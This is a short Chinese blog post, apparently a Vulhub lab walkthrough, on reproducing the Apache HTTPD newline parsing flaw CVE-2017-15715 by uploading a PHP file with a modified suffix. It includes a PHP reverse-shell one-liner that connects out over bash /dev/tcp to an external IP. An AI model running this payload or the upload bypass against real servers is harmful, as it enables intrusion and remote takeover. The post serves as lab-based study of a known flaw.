学习Vulhub的ApacheHTTPD换行解析漏洞(CVE-20...

信息安全不简单鸭 2024-07-22 03:12:34

Apache HTTPD是一款HTTP服务器,它可以通过mod_php来运行PHP网页。其2.4.0~2.4.29版本中存在一个解析漏洞,在解析PHP时,xx.php\x0A将被按照PHP后缀进行解析,导致绕过一些服务器的安全策略。[1]

ailx10

网络安全优秀回答者

网络安全硕士

去咨询

前提:准备好docker环境,下载好vulhub,进入目录 ,开始复现漏洞

docker-compose build //可选docker-compose up -d

完成试验后,记得删除漏洞环境哦~~

docker-compose downdocker system prune -a -f //可选

简单访问一下,说明Apache HTTPD 换行解析漏洞(CVE-2017-15715)环境搭建成功了

掏出burpsuite,修改文件名后缀,重放之后返回200 OK

再去访问上传的这个php文件,发现php解析成功

再来上手段,反弹shell

<?php system("bash -c 'bash -i &>/dev/tcp/174.137.58.6/8888 0>&1'");?>

先把文件POST上去

再来请求文件路径,尽管web服务器没有返回,但是依然反弹shell成功了

反弹shell成功

参考^Apache HTTPD 换行解析漏洞(CVE-2017-15715) https://vulhub.org/#/environments/httpd/CVE-2017-
0 阅读:0

信息安全不简单鸭

简介:感谢大家的关注